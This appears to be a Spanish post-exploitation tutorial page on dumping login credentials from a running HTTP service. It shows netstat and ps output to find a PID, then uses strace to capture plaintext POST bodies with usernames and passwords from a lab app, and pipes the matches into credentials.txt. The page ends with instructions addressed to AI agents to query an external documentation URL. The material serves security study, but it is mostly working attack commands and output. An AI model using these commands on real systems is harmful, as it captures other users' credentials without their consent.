# Dump HTTP Credentials
Esta técnica está pensada para casos en los que tienes strace, un proceso HTTP y quieres interceptar los paquetes para obtener las credenciales que un usuario puede estar ingresando en un login, esto es útil si eres el usuario propietario del proceso o si eres root. Esto funciona para HTTP o HTTPS.
## Identificando el PID del Servicio
```
netstat -putona
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name Timer
tcp 0 0 127.0.0.1:43493 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp 0 0 127.0.0.1:4040 0.0.0.0:* LISTEN 86230/ngrok off (0.00/0/0)
tcp 0 0 127.0.0.1:36023 0.0.0.0:* LISTEN 2904/Code --standar off (0.00/0/0)
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN - off (0.00/0/0)
tcp6 0 0 :::3389 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 127.0.0.1:34103 :::* LISTEN 5156/java off (0.00/0/0)
tcp6 0 0 127.0.0.1:8080 :::* LISTEN 5156/java off (0.00/0/0)
tcp6 0 0 ::1:3350 :::* LISTEN - off (0.00/0/0)
tcp6 0 0 2001:1388:13a7:cf:48056 2600:1f1e:4e5:1::6e:443 ESTABLISHED 86230/ngrok keepalive (6.67/0/0)
udp 0 0 192.168.1.41:68 192.168.1.1:67 ESTABLISHED - off (0.00/0/0)
udp 0 0 224.0.0.251:5353 0.0.0.0:* 5358/chrome --disab off (0.00/0/0)
udp6 0 0 fe80::b625:3910:980:546 :::* - off (0.00/0/0)
```
Tambien podemos identificarlo con ps -aux
```
root 88312 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/6:2-mm_percpu_wq]
root 88313 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/5:2-rcu_gp]
dsds 88389 0.0 0.1 1186390240 64836 ? Sl Apr10 0:00 /home/dsds/BurpSuitePro/burpbrowser/122.0.6261.111/chrome --type=renderer --crashpad-handler-pid=5361 --enable-crash-reporter=, --user-
root 88502 0.8 0.1 260876 37652 pts/0 Sl+ Apr10 0:55 /home/dsds/ponencias/dragon-jar/api/env/bin/python3 app.py
root 88857 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/11:3-cgroup_destroy]
root 89074 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/8:1-events]
root 89553 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/12:1-cgroup_destroy]
root 89555 0.0 0.0 0 0 ? I Apr10 0:00 [kworker/14:0-mm_percpu_wq]
```
Podemos identificar el PID el cual es: 88502.
## Dumpeamos el proceso para obtener las request
```
strace -e trace=network -s 1024 -fp 88502 2>&1
```
## Identificamos el endpoint
```
# strace -e trace=network -s 1024 -fp 88502 2>&1
strace: Process 88502 attached with 2 threads
[pid 88502] --- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
[pid 88502] --- SIGWINCH {si_signo=SIGWINCH, si_code=SI_KERNEL} ---
[pid 88503] accept4(4, {sa_family=AF_INET, sin_port=htons(56866), sin_addr=inet_addr("192.168.1.41")}, [16], SOCK_CLOEXEC) = 5
[pid 88503] getsockname(5, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("192.168.1.41")}, [128 => 16]) = 0
strace: Process 165519 attached
[pid 165519] recvfrom(5, "POST /api/login HTTP/1.1\r\nHost: lab-cors.local\r\nContent-Length: 42\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.112 Safari/537.36\r\nContent-Type: application/json\r\nAccept: */*\r\nOrigin: http://lab-cors.local\r\nReferer: http://lab-cors.local/\r\nAccept-Encoding: gzip, deflate, br\r\nAccept-Language: en-US,en;q=0.9\r\nConnection: close\r\n\r\n{\"usuario\":\"sdfsdf\",\"contrasena\":\"sdfsdf\"}", 8192, 0, NULL, NULL) = 439
[pid 165519] sendto(5, "HTTP/1.1 401 UNAUTHORIZED\r\nServer: Werkzeug/3.0.2 Python/3.11.2\r\nDate: Thu, 11 Apr 2024 05:40:10 GMT\r\nContent-Type: application/json\r\nContent-Length: 42\r\nConnection: close\r\n\r\n", 175, 0, NULL, 0) = 175
[pid 165519] sendto(5, "{\n \"error\": \"Credenciales incorrectas\"\n}\n", 42, 0, NULL, 0) = 42
[pid 165519] shutdown(5, SHUT_WR) = 0
[pid 165519] +++ exited with 0 +++
```
Identificamos las credenciales {\\"usuario\\":\\"sdfsdf\\",\\"contrasena\\":\\"sdfsdf\\"}, y luego con ello podemos identificar el endpoint /api/login.
También podemos identificar este endpoint desde un proxy como burpsuite.
Luego podemos configurar el paremetro -s para que muestre el request completo en caso de necesitarlo.
## Afinando el comando
Podemos tener un comando con el parametro exacto.
```
strace -e trace=network -s 1024 -fp 88502 2>&1 | grep /api/login
```
O sino, tambien podemos almacenar esto en un archivo:
```
(strace -e trace=network -s 1024 -fp 88502 2>&1 | grep /api/login) > credentials.txt
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://cs.desdes.xyz/post-explotacion/dump-http-credentials.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.